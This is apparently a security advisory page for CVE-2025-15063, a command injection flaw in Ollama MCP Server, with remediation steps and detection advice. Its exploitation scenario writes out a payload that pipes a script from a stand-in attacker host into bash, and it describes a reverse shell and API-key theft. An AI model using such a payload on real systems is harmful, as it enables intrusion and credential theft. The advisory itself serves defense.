CVE-2025-15063: Ollama: Command Injection enables RCE
Severity: Unknown | CISA SSVC: Track
Unauthenticated remote code execution in Ollama MCP Server via OS command injection (CWE-78) — an attacker with network access needs zero credentials to own the host. Any AI agent infrastructure running Ollama with its MCP server exposed is at critical risk right now. Immediately restrict network access to Ollama MCP Server to localhost or trusted subnets, and apply the vendor patch as soon as it is available.
What is the risk?
Critical exploitability: no authentication required, network-reachable, trivial command injection technique (CWE-78). Ollama is widely deployed for self-hosted LLM inference in enterprise AI agent stacks and developer environments, increasing blast radius. The MCP (Model Context Protocol) integration layer is increasingly exposed in AI agent architectures, making this a high-probability target. Impact is full host compromise at service account privilege, enabling lateral movement, model exfiltration, and credential harvesting.
How severe is it?
What should I do?
1) IMMEDIATE: Identify all Ollama MCP Server instances in your environment — check for processes listening on default ports and any Docker/container deployments.
2) Restrict network access: bind Ollama MCP Server to 127.0.0.1 or enforce firewall rules to allow only trusted source IPs.
3) Apply least privilege to the Ollama service account — it should not have access to credential stores, cloud IAM roles, or sensitive filesystems.
4) Apply the vendor patch (ZDI-26-020) immediately upon release; monitor the Ollama GitHub repo and the ZDI advisory for patch availability.
5) Detection: monitor for anomalous child processes spawned by the Ollama process (especially shells, curl, wget, base64), and alert on outbound connections from the Ollama service account.
6) If MCP server functionality is not actively required, disable it until patched.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2025-15063?
Unauthenticated remote code execution in Ollama MCP Server via OS command injection (CWE-78) — an attacker with network access needs zero credentials to own the host. Any AI agent infrastructure running Ollama with its MCP server exposed is at critical risk right now. Immediately restrict network access to Ollama MCP Server to localhost or trusted subnets, and apply the vendor patch as soon as it is available.
Is CVE-2025-15063 actively exploited?
No confirmed active exploitation of CVE-2025-15063 has been reported, but organizations should still patch proactively.
How to fix CVE-2025-15063?
The remediation steps are the six listed under "What should I do?" above: identify every Ollama MCP Server instance (listening ports, Docker/container deployments); restrict network access by binding to 127.0.0.1 or firewalling to trusted source IPs; apply least privilege to the Ollama service account; apply the vendor patch (ZDI-26-020) as soon as it is released; monitor for anomalous child processes of the Ollama process (shells, curl, wget, base64) and for outbound connections from the service account; and, if MCP server functionality is not required, disable it until patched.
What systems are affected by CVE-2025-15063?
This vulnerability affects the following AI/ML architecture patterns: model serving, agent frameworks, LLM inference infrastructure, MCP plugin ecosystems.
What is the CVSS score for CVE-2025-15063?
No CVSS score has been assigned yet.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
- AML.T0006 Active Scanning
- AML.T0040 AI Model Inference API Access
- AML.T0049 Exploit Public-Facing Application
- AML.T0050 Command and Scripting Interpreter
- AML.T0053 AI Agent Tool Invocation
- AML.T0072 Reverse Shell
Compliance Controls Affected
What are the technical details?
Original Advisory
Ollama MCP Server execAsync Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ollama MCP Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the execAsync method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27683.
Exploitation Scenario
An adversary scans internet-facing IP ranges for exposed Ollama MCP Server endpoints (common in dev/lab environments left accessible). They craft a malicious tool invocation request targeting the vulnerable execAsync method, injecting a payload such as '; curl https://attacker.com/implant.sh | bash' into the user-controlled string parameter. Because no authentication is enforced, the payload executes immediately as the Ollama service account. The attacker establishes a reverse shell, then enumerates environment variables for LLM API keys (OpenAI, Anthropic), cloud credentials, and RAG database connection strings — subsequently exfiltrating model artifacts and pivoting to connected AI infrastructure.
Weaknesses (CWE)
CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
- [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
- [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.
Source: MITRE CWE corpus.
References
Timeline
Related Vulnerabilities
- CVE-2025-5120 (10.0) smolagents: sandbox escape enables unauthenticated RCE. Same attack type: Code Execution
- CVE-2025-59528 (10.0) Flowise: Unauthenticated RCE via MCP config injection. Same attack type: Code Execution
- CVE-2025-2828 (10.0) LangChain RequestsToolkit: SSRF exposes cloud metadata. Same attack type: Auth Bypass
- CVE-2025-53767 (10.0) Azure OpenAI: SSRF EoP, no auth required (CVSS 10). Same attack type: Auth Bypass
- CVE-2024-2912 (10.0) BentoML: RCE via insecure deserialization (CVSS 10). Same attack type: Code Execution